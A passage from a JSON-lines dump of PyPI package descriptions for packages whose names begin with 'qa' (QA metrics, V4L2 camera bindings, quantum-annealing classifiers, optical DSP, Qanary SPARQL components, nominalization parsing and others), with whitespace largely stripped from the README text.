True'''print(pedant.get_score(reference_answer[0],candidate_answer,question))'''0.7122460127464126'''Transformer MatchOur fine-tuned BERT model is on \ud83e\udd17Huggingface. Our Package also supports downloading and matching directly.distilroberta,distilbert,roberta, androberta-largeare also supported now! \ud83d\udd25\ud83d\udd25\ud83d\udd25fromqa_metrics.transformerMatcherimportTransformerMatcherquestion=\"Which movie is loosley based off the Brother Grimm's Iron Henry?\"tm=TransformerMatcher(\"bert\")scores=tm.get_scores(reference_answer,candidate_answer,question)match_result=tm.transformer_match(reference_answer,candidate_answer,question)print(\"Score:%s; bert Match:%s\"%(scores,match_result))'''Score: {'The Frog Prince': {'The movie \"The Princess and the Frog\" is loosely based off the Brother Grimm\\'s \"Iron Henry\"': 0.6934309}, 'The Princess and the Frog': {'The movie \"The Princess and the Frog\" is loosely based off the Brother Grimm\\'s \"Iron Henry\"': 0.7400551}}; TM Match: True'''If you find this repo avialable, please cite:@misc{li2024panda,title={PANDA (Pedantic ANswer-correctness Determination and Adjudication):Improving Automatic Evaluation for Question Answering and Text Generation},author={Zongxia Li and Ishani Mondal and Yijun Liang and Huy Nghiem and Jordan Lee Boyd-Graber},year={2024},eprint={2402.11161},archivePrefix={arXiv},primaryClass={cs.CL}}Updates[01/24/24] \ud83d\udd25 The full paper is uploaded and can be accessedhere. The dataset is expanded and leaderboard is updated.Our Training Dataset is adapted and augmented fromBulian et al. Ourdataset repoincludes the augmented training set and QA evaluation testing sets discussed in our paper.Now our model supportsdistilroberta,distilbert, a smaller and faster matching model than Bert!Now our model supportsroberta,roberta-large, a larger and more robust matching model than Bert!LicenseThis project is licensed under theMIT License- see the LICENSE file for details.ContactFor any additional questions or comments, please contact [zli12321@umd.edu]."} +{"package": "qam-fpkg", "pacakge-description": "This is a simple example package. You can use\n[Github-flavored Markdown](https://guides.github.com/features/mastering-markdown/)\nto write your content."} +{"package": "qamlib", "pacakge-description": "qamlibThis is a library meant to be an easy way to interact with a V4L2 camera, by\nhaving a simple interface to capture images, and change camera controls. It is\na C++20 class (+ a few structs) together with Python bindings viapybind11.While the Python bindings are the main usage ofqamlib, it is also possible to\nbuildqamlibas a (static) C++ library.Supported featuresGet/set \"normal\" and extended V4L2 controls.Get/set image formats.Get/set framesize and cropping.Get/set framerate (FPS).Read out frames from a capture video device as a NumPy array. With or without\nbuffering.Subscribe to events for a V4L2 device.Planned featuresPushing frames to a output video device.Supporting multiplane devices.There are also some features supported that are currently exclusive to\nQtechnology A/S cameras, but these are not compiled when main-line kernel\nheaders are detected.Exampleimportqamlibcam=qamlib.Camera(\"/dev/video0\")# Use context manager to start and stop streamingwithcam:metadata,frame=cam.get_frame()# gets an image as raw bytes# process imageSee more in thedocumentationBuildingPythonBuilding the Python module is done viamesonpy.Dependenciesgcclibstdc++-devmesonmesonpynlohmann-jsonpybind11pybind11_jsonpython3-buildpython3-devTo build the module:python-mbuildC++Dependiciesgccmesonninjanlohmann-jsonTo build the library we start by runningmesonsetup:mesonsetupbuild-Dpython=falseThen to compile domesoncompile-CbuildTo install the package.mesoninstallTestingUndertests/are some tests, these have only been actually tested on\nQtechnology A/S cameras."} +{"package": "qamlz", "pacakge-description": "QAML-ZwarningThis package is no longer being supported, instead use qamlzim.This is a supervised ML algorithm used to train a Binary Classifier on D-Wave's Quantum Annealers. The library has been set up to be compatible with Scikit-Learn's data representation. The algortihm is intended to be generalizable to any Binary ML problem.In order to run the program you'll need D-Wave credentials, these can be obtained athttps://cloud.dwavesys.com/leap/signup/. You'll need a github account in order to sign up. This account will give you the \"endpoint_url\" and \"account_token\" referenced below.InstallationRun the following to install:$pipinstallqamlzContributorsSpecial thanks to everyone who helped me develop this moduleMy PI and Grad student:Javier Duarte and Raghav Kansal (University of California San Diego, La Jolla, CA 92093, USA)All of QMLQCF, with special mentions of:Jean-Roch (California Institute of Technology, Pasadena, CA 91125, USA)Daniel Lidar (University of Southern California, Los Angeles, CA 90007, USA)Gabriel Perdue (Fermi National Accelerator Laboratory, Batavia, IL 60510, USA)Author of the original QAML-Z code:Alexander Zlokapa (Massachusetts Institute of Technology, Cambridge, MA 02139, USA)Mentoring for code practices:Otto Sievert (GoPro, Inc.)Usageimportqamlz# Generate the Environment (Data) for the Modelenv=qamlz.TrainEnv(X_train,y_train,endpoint_url,account_token)# Generate the Config (Hyperparameters) for the Modelconfig=qamlz.ModelConfig()# Create the Model and begin trainingmodel=qamlz.Model(config,env)model.train()Developing QAML-ZTo install qamlz, along with the tools you need to develop and run tests, run the following in your virtualenv:$pipinstall-e.[dev]"} +{"package": "qamlzim", "pacakge-description": "QAML-ZIMQuantum Adiabatic Machine Learning with Zooming IMproved. This is a supervised ML algorithm used to train a Binary Classifier on D-Wave's Quantum Annealers. The library has been set up to be compatible with Scikit-Learn's data representation. The algortihm is intended to be generalizable to any Binary ML problem.In order to run the program you'll need D-Wave credentials, these can be obtained athttps://cloud.dwavesys.com/leap/signup/. You'll need a github account in order to sign up. This account will give you the \"endpoint_url\" and \"account_token\" referenced below.InstallationRun the following to install:$pipinstallqamlzimContributorsSpecial thanks to everyone who helped me develop this moduleMy PI and Grad student:Javier Duarte and Raghav Kansal (University of California San Diego, La Jolla, CA 92093, USA)All of QMLQCF, with special mentions of:Jean-Roch (California Institute of Technology, Pasadena, CA 91125, USA)Daniel Lidar (University of Southern California, Los Angeles, CA 90007, USA)Gabriel Perdue (Fermi National Accelerator Laboratory, Batavia, IL 60510, USA)Author of the original QAML-Z code:Alexander Zlokapa (Massachusetts Institute of Technology, Cambridge, MA 02139, USA)Mentoring for code practices:Otto Sievert (GoPro, Inc.)Usageimportqamlzim# Generate the Environment (Data) for the Modelenv=qamlzim.TrainEnv(X_train,y_train,endpoint_url,account_token)# Generate the Config (Hyperparameters) for the Modelconfig=qamlzim.ModelConfig()# Create the Model and begin trainingmodel=qamlzim.Model(config,env)model.train()Developing QAML-ZIMTo install qamlzim, along with the tools you need to develop and run tests, run the following in your virtualenv:$pipinstall-e.[dev]"} +{"package": "qampy", "pacakge-description": "QAMPy a DSP chain for optical communication signalsQAMPy is a dsp chain for simulation and equalisation of signals from optical communication transmissions.\nIt is written in Python, but has been designed for high performance and most performance critical\nfunctions are written withpythranto run at speed of compiled c or c++\ncode.QAMPy can equalise BPSK, QPSK and higher-order QAM signals as well as simulate signal impairments.EqualisationFor signal equalisation it contains:CMA and modified CMA equalisation algorithmsRadius directed equalisersseveral decision directed equaliser implementationsphase recovery using blind phase search (BPS) and ViterbiViterbi algorithmsfrequency offset compensationa complete set of pilot-based equalisation routines, including frame synchronization, frequency offset\nestimation, adaptive equalisation and phase recoveryadditional data-aided and real-valued adaptive equaliser routinesImpairmentsIt can simulate the following impairments:frequency offsetSNRPMDphase noisetransceiver impairments such as modulator nonlinearity, DAC frequency response and limited ENOBSignal Quality MetricsQAMpy is designed to make working with QAM signals easy and includes calculations for several\nperformance metrics:Symbol Error Rate (SER)Bit Error Rate (BER)Error Vector Magnitude (EVM)Generalized Mututal Information (GMI)DocumentationWe put a strong focus on documenting our functions and most public functions should be well documented.\nUse help in jupyter notebook to excess the documenation.You can access documentation with an extensive API at ourwebsite.For examples of how to use QAMpy see the Scripts and the Notebooks subdirectory, note that not all files are up-to-date\nYou should in particular look at thecma_equaliser.pyand64_qam_equalisation.pyfiles.InstallationInstallation instructions can be found herehere.StatusQAMpy is still in alpha status, however we daily in our work. We will try to keep the basic API stable\nacross releases, but implementation details under core might change without notice.Licence and AuthorsQAMpy was written by Mikael Mazur and Jochen Schr\u00f6der from the Photonics Laboratory at Chalmers University of Technology\nand is licenced under GPLv3 or later.CitingIf you use QAMpy in your work please cite us asJochen Schr\u00f6der and Mikael Mazur, \"QAMPy a DSP chain for optical communications, DOI: 10.5281/zenodo.1195720\".AcknowledgementsThe GPU graphics card used for part of this work was donated by NVIDIA Corporation"} +{"package": "qanalytics-python", "pacakge-description": "Library to consume qanalytics API services (https://www.qanalytics.cl)Install:pip3installqanalytics_pythonFor exampleTo consume the service \"Webservices QMGPS\"endpoint: \"/gps_test/service.asmx\"method: \"WM_INS_REPORTE_PUNTO_A_PUNTO\"params:fromdatetimeimportdatetimefromqanalytics_python.qanalyticsimportQAnalyticsqa_client=QAnalytics(\"WS_test\",\"$$WS17\")data={\"ID_REG\":\"test\",\"LATITUD\":-32.1212,\"LONGITUD\":-72.551,\"VELOCIDAD\":0,\"SENTIDO\":0,\"FH_DATO\":datetime.strptime(\"2019-12-27 08:23:50\",'%Y-%m-%d%H:%M:%S'),\"PLACA\":\"TEST\",\"CANT_SATELITES\":1,\"HDOP\":1,\"TEMP1\":999,\"TEMP2\":999,\"TEMP3\":999,\"SENSORA_1\":-1,\"AP\":-1,\"IGNICION\":-1,\"PANICO\":-1,\"SENSORD_1\":-1,\"TRANS\":\"TEST\",}resp=qa_client.send_request(data,\"/gps_test/service.asmx\",\"WM_INS_REPORTE_PUNTO_A_PUNTO\")print(f\"response code:{resp.code.name}\")print(f\"response text:{resp.text}\")print(f\"response code:{resp.http_code}\")Note that for fields of type \"DATETIME\" you must pass an object of type \"datetime.datetime\" as a parameter.Conversion Example:date_str=\"2019-12-27 08:23:50\"datetime.strptime(date_str,'%Y-%m-%d%H:%M:%S')"} +{"package": "qanary-helpers", "pacakge-description": "Qanary Helpers libraryQanary Helpers implements registration and querying functionality forthe Qanary framework.This library is used within a Python Qanary Component.InstallVia PIPpipinstallqanary_helpersLatest version from GitHubgitclonehttps://github.com/Perevalov/qanary_helpers.gitcdqanary_helpers\npipinstall.UsageFor the \"Hello world example\" create a file namedcomponent.pyin your working directory. Then, fill the file with the\nfollowing code (pay attention to theTODOcomments):importosfromdatetimeimportdatetimefromfastapiimportFastAPI,Requestfromfastapi.responsesimportJSONResponse,PlainTextResponseimportuvicornfromqanary_helpers.registrationimportRegistrationfromqanary_helpers.registratorimportRegistratorfromqanary_helpers.qanary_queriesimportinsert_into_triplestore,get_text_question_in_graphfromqanary_helpers.loggingimportMLFlowLoggerifnotos.getenv(\"PRODUCTION\"):fromdotenvimportload_dotenvload_dotenv()# required for debugging outside DockerSPRING_BOOT_ADMIN_URL=os.environ['SPRING_BOOT_ADMIN_URL']SPRING_BOOT_ADMIN_USERNAME=os.environ['SPRING_BOOT_ADMIN_USERNAME']SPRING_BOOT_ADMIN_PASSWORD=os.environ['SPRING_BOOT_ADMIN_PASSWORD']SERVICE_HOST=os.environ['SERVICE_HOST']SERVICE_PORT=os.environ['SERVICE_PORT']SERVICE_NAME_COMPONENT=os.environ['SERVICE_NAME_COMPONENT']SERVICE_DESCRIPTION_COMPONENT=os.environ['SERVICE_DESCRIPTION_COMPONENT']URL_COMPONENT=f\"{SERVICE_HOST}\"# While using server with permanent external IP address: URL_COMPONENT = f\"http://{SERVICE_HOST}:{SERVICE_PORT}\"app=FastAPI()@app.post(\"/annotatequestion\")asyncdefqanary_service(request:Request):request_json=awaitrequest.json()triplestore_endpoint_url=request_json[\"values\"][\"urn:qanary#endpoint\"]triplestore_ingraph_uuid=request_json[\"values\"][\"urn:qanary#inGraph\"]# get question text from triplestorequestion_text=get_text_question_in_graph(triplestore_endpoint_url,triplestore_ingraph_uuid)[0]['text']# Start TODO: configure your business logic here and adjust the sparql query# here we simulate that our component created this sparql query:sparql_query=\"\"\"PREFIX dbr: PREFIX dbo: SELECT * WHERE {dbr:Angela_Merkel dbo:birthPlace ?uri .}\"\"\"# and this \"generated\" query is stored in the triplestore with this INSERT query:SPARQLquery=\"\"\"PREFIX dbr: PREFIX dbo: PREFIX qa: PREFIX oa: PREFIX rdf: PREFIX xsd: INSERT {{GRAPH <{uuid}> {{?newAnnotation rdf:type qa:AnnotationOfAnswerSPARQL .?newAnnotation oa:hasTarget <{question_uri}> .?newAnnotation oa:hasBody\\\"{sparql_query}\\\"^^xsd:string .?newAnnotation qa:score\\\"1.0\\\"^^xsd:float .?newAnnotation oa:annotatedAt ?time .?newAnnotation oa:annotatedBy .}}}}WHERE {{BIND (IRI(str(RAND())) AS ?newAnnotation) .BIND (now() as ?time)}}\"\"\".format(uuid=triplestore_ingraph_uuid,question_uri=triplestore_endpoint_url,component=SERVICE_NAME_COMPONENT.replace(\" \",\"-\"),sparql_query=sparql_query.replace(\"\\n\",\"\\\\n\").replace(\"\\\"\",\"\\\\\\\"\"))insert_into_triplestore(triplestore_endpoint_url,SPARQLquery)# inserting new data to the triplestore# Initializing logging with MLFlow# TODO: Update connection settings, if necessarylogger=MLFlowLogger()# logging the annotation of the component# TODO: replace \"sparql_query\" with your annotation datalogger.log_annotation(SERVICE_NAME_COMPONENT,question_text,sparql_query,triplestore_ingraph_uuid)# End TODOreturnJSONResponse(content=request_json)@app.get(\"/health\")defhealth():returnPlainTextResponse(content=\"alive\")metadata={\"start\":datetime.now().strftime(\"%Y-%m-%d%H:%M:%S\"),\"description\":SERVICE_DESCRIPTION_COMPONENT,\"written in\":\"Python\"}print(metadata)registration=Registration(name=SERVICE_NAME_COMPONENT,serviceUrl=f\"{URL_COMPONENT}\",healthUrl=f\"{URL_COMPONENT}/health\",metadata=metadata)reg_thread=Registrator(SPRING_BOOT_ADMIN_URL,SPRING_BOOT_ADMIN_USERNAME,SPRING_BOOT_ADMIN_PASSWORD,registration)reg_thread.setDaemon(True)reg_thread.start()if__name__==\"__main__\":uvicorn.run(app,host=\"0.0.0.0\",port=int(SERVICE_PORT))As you may see, several environment variables has to be set before the script execution:SPRING_BOOT_ADMIN_URL-- URL of the Qanary pipeline (see Step 1 and Step 2 of thetutorial)SPRING_BOOT_ADMIN_USERNAME-- the admin username of the Qanary pipelineSPRING_BOOT_ADMIN_PASSWORD-- the admin password of the Qanary pipelineSERVICE_HOST-- the host of your component without protocol prefix (e.g.http://). It has to be visible to the Qanary pipelineSERVICE_PORT-- the port of your component (has to be visible to the Qanary pipeline)SERVICE_NAME_COMPONENT-- the name of your componentSERVICE_DESCRIPTION_COMPONENT-- the description of your componentYou may also change the configuration via environment variables to any configuration that you want (e.g. via ajsonfile).To run the component, simply executepython component.pyin your terminal.\nIf the component registration was successful, a corresponding message will appear in the output."} +{"package": "qanat", "pacakge-description": "A shoot-em-up inspired by the classic Galaxians game. Repel waves of invaders using your gun turret. Manage the temperate of the turret to avoid overheating and watch your ammo level to avoid running out in the later levels.Requires: Python 2.6+ and pygame 1.9+"} +{"package": "qanda", "pacakge-description": "BackgroundInteractive command-line programs need to query users for information, be it\ntext, choices from a list, or simple yes-or-no answers.qandais a Python\nmodule of simple functions to prompt users for such information, allowing\nvalidation and cleanup of answers, default responses, consistent formatting and\npresentation of help text, hints and choices. It is not a replacement for\ntextual interfaces like curses and urwid, but intended solely for simple console\nscripts with user input is required.InstallationThe simplest way to installqandais viaeasy_installor an equivalent\nprogram:% easy_install qandaAlternatively the tarball can be downloaded, unpacked andsetup.pyrun:% tar zxvf qanda.tgz\n% cd qanda\n% python set.py installqandahas no requisites and should work with just about any version of Python.Using qandaExamples>>> from qanda import prompt\n>>> prompt.string (\"What is your name\")\nWhat is your name: Foo\n>>> fname = prompt.string (\"Your friends name is\",\n help=\"I need to know your friends name as well before I talk to you.\",\n hints=\"first name\",\n default='Bar',\n )\n\nI need to know your friends name as well before I talk to you.\nYour friends name is (first name) [Bar]:\n>>> print fname\nBar\n>>> years = prompt.integer (\"And what is your age\", min=1, max=100)\nAnd what is your age: 101\nA problem: 101 is higher than 100. Try again ...\nAnd what is your age: 28Central conceptsqandapackages all question-asking methods in a Session class. This allows\nthe appearance and functioning of all these methods to be handled consistently\nand modified centrally. However, you don\u2019t necessarily have to create a Session\nto use it - there\u2019s pre-existing Session in the variable calledprompt:>>> from qanda import Session\n>>> s = Session()\n>>> from qanda import prompt\n>>> type (prompt)\nThe question methods are named after the type of data they elicit:>>> print type(prompt.integer (\"Pick a number\"))\nPick a number: 2\n\n>>> print type(prompt.string (\"Pick a name\"))\nPick a name: Bob\nMany of the question methods with accept a list of \u201cconverters\u201d, each of which\nis used to sucessively transform or validate user input. If input fails\nvalidation, the question is posed again.qandasupplies a number of basic\nvalidators:ToInt, ToFloatConvert inputs to other typesRegexnly allow values that match a certain patternRangeCheck that input falls within given boundsLengthCheck that input length falls within given boundsSynonymsMap values to other valuesVocabEnsure values fall within a fixed setReferences[qanda-home]qanda home pagehttp://www.agapow.net/software/py-qanda[qanda-pypi]qanda on PyPiHistoryv0.1dev (20110624)Initial release, sure to be buggy and incomplete"} +{"package": "qandaomr", "pacakge-description": "OMRThis package can create a form which can be read in with OMR and can read those forms.UsageCreating an OMR formTo create an OMR enabled form you must make a form (with Word, LaTeX or similar software) and mark the first bullet points with aredbackground and the last with agreenbackground. At last the corners should be marked: the bottom right corner must be marked with a black square and the three other corners with a QR code like corner. At this moment the user must do this themselfes (this may change in the future). The imput to OMR must be an image file.Running the following will generate a printable output sheet with barcodes at the bottom which OMR uses to detect the settingsqandaomr -c input_file output_file columns rows points_per_question questions_per_blockReading an OMR formTo get the answers back from the form a scanned image can be the input to OMR. OMR will print the answers to the terminal in a CSV format.qandaomr -r input_fileGenerating intermediate filesFor debug purposes the-dflag can be used. This will generate multiple images which are used in the steps within OMR. This can be useful if OMR does not react the way it shouldInstallationTo install this package clone this repository and install via pip:pip install qandaomrUninstalling can be done via pip:pip uninstall qandaomr"} +{"package": "qandaxfmrartifact", "pacakge-description": "qandaxfmrartifactBentoML artifact framework for Q&A Transformers.Installation:pip install qandaxfmrartifact==0.0.1Usage example (decorate service):from qandaxfmrartifact.QandaTransformersModelArtifact import QandaTransformersModelArtifact\n\n@artifacts([QandaTransformersModelArtifact('albert')])\nclass MyBentoService(BentoService):Usage example (package model):svc = MyBentoService()\n\nopts = {\n 'embedder_model_path': my_embedder_model_path,\n}\n\nsvc.pack('albert', my_transformer_model_path, opts)Alternatively, during training:svc.pack('albert', {'model': my_trained_model, 'tokenizer': my_tokenizer, 'embedder': my_embedder})"} +{"package": "qandle", "pacakge-description": "QANDLE"} +{"package": "qaner", "pacakge-description": "QaNERUnofficial implementation ofQaNER: Prompting Question Answering Models for Few-shot Named Entity Recognition.You can adopt this pipeline for arbitraryBIO-markupdata.Installationpip install qanerCoNLL-2003Pipeline results on CoNLL-2003 dataset:MetricsTrained Hugging Face modelHow to useTrainingScript for training QaNER model:qaner-train \\\n--bert_model_name 'bert-base-uncased' \\\n--path_to_prompt_mapper 'data/conll2003/prompt_mapper.json' \\\n--path_to_train_data 'data/conll2003/train.bio' \\\n--path_to_test_data 'data/conll2003/test.bio' \\\n--path_to_save_model 'dayyass/qaner-conll-bert-base-uncased' \\\n--n_epochs 2 \\\n--batch_size 128 \\\n--learning_rate 1e-5 \\\n--seed 42 \\\n--log_dir 'runs/qaner'Required arguments:--bert_model_name- base bert model for QaNER fine-tuning--path_to_prompt_mapper- path to prompt mapper json file--path_to_train_data- path to train data (BIO-markup)--path_to_test_data- path to test data (BIO-markup)--path_to_save_model- path to save trained QaNER model--n_epochs- number of epochs to fine-tune--batch_size- batch size--learning_rate- learning rateOptional arguments:--seed- random seed for reproducibility (default: 42)--log_dir- tensorboard log_dir (default: 'runs/qaner')InfrerenceScript for inference trained QaNER model:qaner-inference \\\n--context 'EU rejects German call to boycott British lamb .' \\\n--question 'What is the organization?' \\\n--path_to_prompt_mapper 'data/conll2003/prompt_mapper.json' \\\n--path_to_trained_model 'dayyass/qaner-conll-bert-base-uncased' \\\n--n_best_size 1 \\\n--max_answer_length 100 \\\n--seed 42Result:question: What is the organization?\n\ncontext: EU rejects German call to boycott British lamb .\n\nanswer: [Span(token='EU', label='ORG', start_context_char_pos=0, end_context_char_pos=2)]Required arguments:--context- sentence to extract entities from--question- question prompt with entity name to extract (examples below)--path_to_prompt_mapper- path to prompt mapper json file--path_to_trained_model- path to trained QaNER model--n_best_size- number of best QA answers to considerOptional arguments:--max_answer_length- entity max length to eliminate very long entities (default: 100)--seed- random seed for reproducibility (default: 42)Possible inference questions for CoNLL-2003:What is the location? (LOC)What is the person? (PER)What is the organization? (ORG)What is the miscellaneous entity? (MISC)RequirementsPython >= 3.7Citation@misc{liu2022qaner,title={QaNER: Prompting Question Answering Models for Few-shot Named Entity Recognition},author={Andy T. Liu and Wei Xiao and Henghui Zhu and Dejiao Zhang and Shang-Wen Li and Andrew Arnold},year={2022},eprint={2203.01543},archivePrefix={arXiv},primaryClass={cs.LG}}"} +{"package": "qanom", "pacakge-description": "QANom - Annotating Nominal Predicates with QA-SRLQANom is a research project aiming for a natural representation of nominalization's predicate-argument relations.\nIt extends the Question Answer driven Semantic Role Labeling (QASRL) framework (seewebsite), which tackled verbal predicates,\nto the more challenging space of deverbal nominalizations.This repository is the reference point for the data and software described in the paperQANom: Question-Answer driven SRL for Nominalizations(COLING 2020).\nTo find information for replicating the work described by the QANom paper (crowdsourcing a QANom dataset, identifying nominalization candidates, training and evaluating the baseline models), please refer to thepaper_reference_readme.md.The repo also consists software for using QANom downstream.\nThis mainly includes pipelines for easy usage of thenominalization detection modeland of theQANom parsers.\nThis README will guide you through using this software.Pre-requisitePython 3.7InstallationFrom pypi:pip install qanomIf you want to install from source, clone this repository and then install requirements:gitclonehttps://github.com/kleinay/QANom.gitcdQANom\npipinstallrequirements.txtEnd-to-End PipelineIf you wish to parse sentences with QANom, the best place to start is theQANomEndToEndPipelineclass from theqanom.qanom_end_to_end_pipelinemodule.This pipeline is first running theNominalization Detectorfor identifying the nominal predicates in the sentence (seedemo).\nThen, it sends each nominal predicate to theQAnom-Seq2Seq model(seedemo) to parse them with Question-Answer driven Semantic Role Labeling (QASRL).Usage Examplefromqanom.qanom_end_to_end_pipelineimportQANomEndToEndPipelinepipe=QANomEndToEndPipeline(detection_threshold=0.75)sentence=\"The construction of the officer 's building finished right after the beginning of the destruction of the previous construction .\"print(pipe([sentence]))Output:[[{'QAs':[{'question':'what was constructed ?','answers':[\"the officer 's\"]}],'predicate_idx':1,'predicate':'construction','predicate_detector_probability':0.7623529434204102,'verb_form':'construct'},{'QAs':[{'question':'what began ?','answers':['the destruction of the']}],'predicate_idx':11,'predicate':'beginning','predicate_detector_probability':0.8923847675323486,'verb_form':'begin'},{'QAs':[{'question':'what was destructed ?','answers':['the previous']}],'predicate_idx':14,'predicate':'destruction','predicate_detector_probability':0.849774956703186,'verb_form':'destruct'}]]Nominalization Detection ModelThis model identifies \"predicative nominalizations\", that is, nominalizations that carry an eventive (or \"verbal\") meaning in context. It is abert-base-casedpretrained model, fine-tuned for token classification on top of the \"nominalization detection\" task as defined and annotated by the QANom project.The model is trained as a binary classifier, classifying candidate nominalizations.\nThe candidates are extracted using a POS tagger (filtering common nouns) and additionally lexical resources (e.g. WordNet and CatVar), filtering nouns that have (at least one) derivationally-related verb. In the QANom annotation project, these candidates are given to annotators to decide whether they carry a \"verbal\" meaning in the context of the sentence. The current model reproduces this binary classification.Under the hood, theNominalizationDetectorclass encapsulates the full nominalization detection pipeline (i.e. candidate extraction + predicate classification).\nIt leverages theqanom.candidate_extraction.candidate_extraction.pymodule, and additionally downloads and wraps thenominalization-candidate-classifiermodel, hosted at Huggingface model hub.Usage Examplefromqanom.nominalization_detectorimportNominalizationDetectordetector=NominalizationDetector()raw_sentences=[\"The construction of the officer 's building finished right after the beginning of the destruction of the previous construction .\"]print(detector(raw_sentences,return_all_candidates=True))print(detector(raw_sentences,threshold=0.75,return_probability=False))Outputs:[[{'predicate_idx':1,'predicate':'construction','predicate_detector_prediction':True,'predicate_detector_probability':0.7626778483390808,'verb_form':'construct'},{'predicate_idx':4,'predicate':'officer','predicate_detector_prediction':False,'predicate_detector_probability':0.19832570850849152,'verb_form':'officer'},{'predicate_idx':6,'predicate':'building','predicate_detector_prediction':True,'predicate_detector_probability':0.5794129371643066,'verb_form':'build'},{'predicate_idx':11,'predicate':'beginning','predicate_detector_prediction':True,'predicate_detector_probability':0.8937646150588989,'verb_form':'begin'},{'predicate_idx':14,'predicate':'destruction','predicate_detector_prediction':True,'predicate_detector_probability':0.8501205444335938,'verb_form':'destruct'},{'predicate_idx':18,'predicate':'construction','predicate_detector_prediction':True,'predicate_detector_probability':0.7022264003753662,'verb_form':'construct'}]][[{'predicate_idx':1,'predicate':'construction','verb_form':'construct'},{'predicate_idx':11,'predicate':'beginning','verb_form':'begin'},{'predicate_idx':14,'predicate':'destruction','verb_form':'destruct'}]]SpaCy Custom Component 'nominalization_detector'If you are using SpaCy, you can easily plug-in our nominalization detection algorithm as a custom component into theSpaCy pipeline. Load theqanom.spacy_component_nominalization_detectormodule to have our \"nominalization_detector\" component registered by spacy.For example:fromqanom.spacy_component_nominalization_detectorimport*nlp=spacy.load(\"en_core_web_sm\")nlp.add_pipe(\"nominalization_detector\",after=\"tagger\",config={\"threshold\":0.7,\"device\":-1})# you may specify config settings or stay with these defaults# Now you `nlp` pipeline also identifies verbal nominalizations:doc=nlp(\"The medical student asked about the progress in Luke's treatment.\")print(doc._.nominalizations)# a Doc extension attribute with the list of tokens identified as verbal nominalizationsprint([(nn.text,nn._.verb_form,nn._.is_nominalization_confidence)fornnindoc._.nominalizations])# Token extension attributes[progress, treatment]\n[('progress', 'progress', 0.8063599467277527),\n ('treatment', 'treat', 0.8211929798126221)]QANom Sequence-to-Sequence ModelsWe have finetuned T5, a pretrained Seq-to-Seq language model, on the task of parsing QANom QAs.\nGiven a sentence and a highlighted nominal predicate, the models produce an output sequence consisting of the QANom-formatted question-answer pairs for this predicate.We currently have two models:qanom-seq2seq-model-baseline(HF repo) - trained only on the QANom dataset. Performance: 57.6 Unlabled Arg F1, 34.9 Labeled Arg F1.qanom-seq2seq-model-joint(HF repo) - trained jointly on the QANom and verbal QASRL. Performance: 60.1 Unlabled Arg F1, 40.6 Labeled Arg F1.We provide theQASRL_Pipelineclass (at `qanom.qasrl_seq2seq_pipeline) which is a Huggingface Pipeline for applying the models out-of-the-box on new texts:frompipelineimportQASRL_Pipelinepipe=QASRL_Pipeline(\"kleinay/qanom-seq2seq-model-baseline\")pipe(\"The student was interested in Luke 's research about see animals .\",verb_form=\"research\",predicate_type=\"nominal\")Which will output:[{'generated_text':'who _ _ researched something _ _ ? Luke','QAs':[{'question':'who researched something ?','answers':['Luke']}]}]You can learn more about usingtransformers.pipelinesin theofficial docs.Notice that you need to specify which word in the sentence is the predicate, about which the question will interrogate. By default, you should precede the predicate with thesymbol, but you can also specify your own predicate marker:pipe(\"The student was interested in Luke 's research about see animals .\",verb_form=\"research\",predicate_type=\"nominal\",predicate_marker=\"\")In addition, you can specify additional kwargs for controling the model's decoding algorithm:pipe(\"The student was interested in Luke 's research about see animals .\",verb_form=\"research\",predicate_type=\"nominal\",num_beams=3)Cite@inproceedings{klein2020qanom,\n title={QANom: Question-Answer driven SRL for Nominalizations},\n author={Klein, Ayal and Mamou, Jonathan and Pyatkin, Valentina and Stepanov, Daniela and He, Hangfeng and Roth, Dan and Zettlemoyer, Luke and Dagan, Ido},\n booktitle={Proceedings of the 28th International Conference on Computational Linguistics},\n pages={3069--3083},\n year={2020}}"} +{"package": "qanotify", "pacakge-description": "QA notify"} +{"package": "qanpdf", "pacakge-description": "This is the homepage of ouir project."} +{"package": "qante", "pacakge-description": "MotivationExtracting the highly-valuable data from unstructured text often\nresults in hard-to-read, brittle, difficult-to-maintain code.\nThe problem is that using regular expressions directly embedded\nin the program control flow does not provide the best level of\nabstraction. We propose a query language (based on the tuple\nrelational calculus) that facilitates data extraction.\nDevelopers can explicitly express their intent declaratively,\nmaking their code much easier to write, read, and maintain.SolutionThis package allows programmers to express what they are searching\nfor by using higher-level concepts to express their query as tags,\nlocations, and expressions on location relations.Thelocationof a string of characters within the document is\nthe interval defining its starting and ending position.Locations are grouped into sets named bytags. Tags can be\nused in conjunctions and disjunctions of interval relations to\nquery for tuples of locations.DocumentationWe invite you to view our YouTubevideoof ourpresentationfrom thePlaylistforPyData Global 2022.We presented this material from ourGitHubrepo:pydataG22.pdfslides of our talk.ipynb/pydata.ipynbajupyter notebookwith examples.RELEASE_NOTES.rstdescribes updates for each release.Use one of these pip or python commands (rev 3 or above) to install fromPyPI:pip install qante\npython -m pip install qanteUse python docstrings for API Documentation:python # rev 3 or above\n from quante.tagger import Tagger\n from quante.query import Query\n from quante import loctuple as lt\n from quant.table import get_table\n\n help(Tagger) # annotate text with tags using tagRE('tagname', regexp)\n help(Query) # Syntax for querying annotated text\n help(lt) # Predicates used by queries\n help(get_table) # extract table (as dictionaries) from textSee also: \u201cAPI Documentation\u201d at the end of our jupyter notebook.We welcome your questions by electronic mail at: qante{at}asgard.com"} +{"package": "qanty", "pacakge-description": "qantyPython package for integration of Qanty in other applicationsSupported Python VersionsThis library supports the following Python implementations:Python 3.8Python 3.9Python 3.10Python 3.11InstallationInstall from PyPi usingpip, a\npackage manager for Python.pip3installqantyTest your installationTry listing your company branches. Save the following code sample to your computer with a text editor. Be sure to update theauth_token, andcompany_idvariables.fromqantyimportQanty# Your Auth Tokenclient=Qanty(auth_token=\"your_auth_token\",company_id=\"your_company_id\")branches=client.get_branches()forbranchinbranches:print(f\"Branch ID{branch.id}, name{branch.name}\")"} +{"package": "qany", "pacakge-description": "introsuppose you want to make a comand line tool called qany.\nit accept integer as numbers\nouput carrots we need to feedex:\n\tcmd> qany 2 \n\touput: 4we can get the output by two ways:command lineqany2call python moudlepython-mqany2best practice schemaenvGenerated bymake envThis is first step you need to do in any python projectit will create a virtual envauto source itinstall requirements for the start uptestrunmake testrunmake runwill run in module modemake mainwill run in normal modeYou can see thatmain.pyandqany/__main__.pyare the same content file.why do we needmain.py?\nIt is eay to make an entry in IDE , like intellij.Could I just use__main__.pyto run like this?pythonqany/__main__.pyYou cound not.That is because the top-level package problem.Ex:python main.py \ntop-level package is the same as main.py\n\npython src/func/main.py \ntop-level package is the same as main.py, aka func \ntop-level package is the folder where you run this 